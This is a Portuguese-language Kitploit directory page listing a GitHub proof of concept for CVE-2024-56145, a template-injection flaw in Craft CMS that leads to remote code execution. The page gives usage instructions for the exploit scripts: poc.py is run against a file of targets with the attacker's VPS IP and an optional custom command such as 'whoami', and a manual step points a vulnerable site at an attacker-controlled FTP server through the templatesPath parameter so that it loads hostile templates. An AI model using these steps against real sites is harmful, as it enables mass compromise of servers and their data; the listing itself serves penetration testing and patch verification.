Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-56145-craftcms-rce — CVE-2024-56145 SSTI para RCE - modelos twig | Kitploit
Ferramentas/GitHubGitHub/sachinart/cve-2024-56145-craftcms-rce
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubsachinart/cve-2024-56145-craftcms-rce

CVE-2024-56145-craftcms-rce

CVE-2024-56145 SSTI para RCE - modelos twig

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
43há 1 anoAinda não revisado
Compartilhar

Antes de executar o script novamente, faça

fuser -k 6666/tcp

Uso -

python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200

Comando personalizado pode ser usado como python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami"

-i é o seu IP ou o IP do seu VPS (use isso executando ipconfig / ifconfig.

Como - python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t 200

Exploração manual, execute o poc.py acima contra os alvos que você tem, você verá um arquivo de saída com alvos vulneráveis

E agora? Você tem um alvo vulnerável, mas quer jogar mais? Então adicionei o poc2.py para teste manual contra o alvo. Como fazer isso? faça fuser -k 6666/tcp

root@kitploit:~
1. Execute o poc2.py (porta 6666 iniciada como FTP).
2. Abra o navegador yourtarget.com/?--templatesPath=ftp://VPS-IP:6666/
3. você verá -

image

Escrito por Chirag Artani (https://x.com/Chirag99Artani)

Baixar ferramenta